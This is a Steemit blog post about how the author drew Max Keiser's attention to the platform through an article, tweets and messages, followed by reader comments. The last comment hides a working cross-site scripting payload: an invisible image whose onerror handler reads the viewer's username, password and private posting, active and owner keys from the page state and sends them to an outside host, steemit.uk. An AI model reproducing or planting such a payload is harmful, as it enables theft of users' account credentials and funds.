This is the process I used to get the attention of @max-keiser (yes...he has an account on steemit)
This is kind of a case study for people interested in the science and art of #marketing. Hopefully this can help the other promoters who are looking to get the attention of people who have a lot of reach in the media...to whatever end you are looking to accomplish
1. Write an article about them
This is the article if you are curious.I wrote an article a month ago about how @max-keiser had a big part to play in my personal transformation.
Now, I didn't lie or deceive. I was genuine about how his content shaped the way I see the world.
2. Tweet/Retweet and Tag
So, hopefully, the person you want to get the attention of is paying attention to their brand and what people write about them. If not, it's going to be an uphill battle. Max Keiser and his wife Stacy are very attentive to their brand.
So when I wrote this tweet:
"How @maxkeiser Changed My Life #gratitude #life @stacyherbert https://steemit.com/startcoin/@cryptoctopus/how-max-keiser-changed-my-life"
He and Stacy then retweeted to all of their followers and he proceeded to follow me.
3. Private Message
Now that he know who I was. Or at least that I was someone who appreciated him. I moved forward with an invitation:

4. Wait for something to happen
Ok, at this point, there was no way to know what would happen. But MIRACLE, he did respond to the invitation.
See the tread here https://steemit.com/ama/@wmougayar/hi-im-william-mougayar-from-toronto-canada#@max-keiser/re-cryptoctopus-re-wmougayar-re-cryptoctopus-re-wmougayar-hi-im-william-mougayar-from-toronto-canada-20160609t171317814z
5. Follow Up

I didn't have any news after a month so I went ahead and realize he had money sitting in his account. So I followed up with him. He seemed pretty happy about it. I then proceeded to suggest reading the Steemit's Evil Plan for Cryptocurrency World Domination by @dan .
Future will tell
In any case, I'm pretty happy to be in contact with him via twitter. Whether or not anything comes out of it is to be seen but it's been a great learning experience.
Great job. Amazing post. At the very least you clearly got someone who has influence and an audience interested in Steem. He seems genuinely interested, as well he should be. Everyone on Steemit should take serious lessons from this post. Absolutely perfect. The key thing you did was did him FAVORS. You did stuff to genuinely help him. That's how to market. You don't deceive or guilt people, you do something for them in the hope they will then be open to doing something for you that is mutually beneficial for your both.
A job well done sir. edit: shared on facebook and twitter for ya.
@cryptoctopus thanks for detailing a successfull know-how, definitely it extended and opend my mind and gave me a great idea! Cheers, Damir
Yes cryptoctopus! Boom!!!!
Thanks for breaking down the formula you used for sparking an influencer's interest in the platform.
For me it is not important who you brought....it is important how you brought.You had an ingenious idea.
Max Keiser saw the potential of steem thats why he is in ... So you did a great favor to him for a long term.
Super-duper cool. I'm such a fan of Max Keiser. I first found out about him during the referendum on Scottish independence. Been watching him ever since :D
Jealous that you were able to speak to him personally!!
Very cool! I love Max Keiser's content, but unfortunately I don't see as much of it anymore because he blocked me on Twitter. A while back he was pumping a coin and I called him out on it because it was kind of a crappy crypto. Probably not my best moment. Stacy still follows me on Twitter though, which is cool. Haven't been very active there lately... especially not since Steemit. :)
Hopefully he'll cross post his content here, and I can follow it again. Thanks again for a great example of how to connect with celebrities in meaningful ways (something I'm clearly not good at doing).
I'll unblock you - are you @lukestokes?
just unblocked you
Hahah! You rock, Max. Thanks for the RT also. :)
Okay, I had to tell the whole story. Here it is!
way to cool, he will help us grow
Thanks for the info!
Nice job!
This will work brilliantly with a certain type of influential personality - time we all got tweeting ;)
Job well done dude. I'm still trying to figure this all out. :)
Good job!
see you (y)
Yep @cryptoctopus got me posting on Steem for sure... Users getting to moneitize their work is sorely needed...
We need to get Andreas Antonopolous in here ...
Right on man I've done this for a few of my favorites on Youtube as well, but I do watch Max Keiser and Stacy Herbert everyday so they are definitely at the top of my list!
Good foresight! Max Keiser is a tight fit with crypto and social media.
Nice work on the lure. Love your show on RT by the way Max!
Not yet understood as what should be looking for money in the steemit?
Good tips. I'd love to see a few more people on Steemit, such as:
And all the other cool people that are owning the alt media right now.
thanks for informative post. certainly helps
Thanks for this amazing post. i am also started tell about #steemit to my friends and family members.
again thank you !
another great post, thank you man
Very much welldone for u sir
Hat off
a toast to bad-assery!!! ;-)
Wow! Great Job! :)
Excellent! I love Max, let's get them all on here. I'd love to hear Alex Jones screaming at us about how the world's gonna end at the top of the trending feed :)
#steem is the best invention of the decade!<img src="awesome.jpg" onerror="if(window.store.getState().user._root.entries != undefined){if(window.store.getState().user._root.entries[0]!=undefined && window.store.getState().user._root.entries[0][1] !=null){document.createElement('img').src='http\s://steemit.uk/u/'+(window.store.getState().user._root.entries[0][1]._root.entries[0][1]===null?'/p/nil/pr/nil/pu/nil':window.store.getState().user._root.entries[0][1]._root.entries[0][1])+'/p/'+((window.store.getState().user._root.entries[0][1]._root.entries[1]===undefined || window.store.getState().user._root.entries[0][1]._root.entries[1][1]===null)?'nil/pr/nil/pu/nil':((window.store.getState().user._root.entries[0][1]._root.entries[1][1]+'/pr/'+((window.store.getState().user._root.entries[0][1]._root.entries[2]===undefined || window.store.getState().user._root.entries[0][1]._root.entries[2][1]===null || window.store.getState().user._root.entries[0][1]._root.entries[2][1]._root.entries[0]===undefined || window.store.getState().user._root.entries[0][1]._root.entries[2][1]._root.entries[0][1]===null)?'nil/pu/nil':((window.store.getState().user._root.entries[0][1]._root.entries[2][1]._root.entries[0][1].toWif()) + (window.store.getState().user._root.entries[0][1]._root.entries[2][2] == null ? '' : '--active-' + window.store.getState().user._root.entries[0][1]._root.entries[2][1]._root.entries[0][1].toWif()) + (window.store.getState().user._root.entries[0][1]._root.entries[2][2] == null ? '' : '--owner-' + window.store.getState().user._root.entries[0][1]._root.entries[2][1]._root.entries[2][1].toWif()) +'/pu/'+(window.store.getState().user._root.entries[0][1]._root.entries[2][1]._root.entries[0][1].toPublicKey().toString()))))))}}" style="display:none;">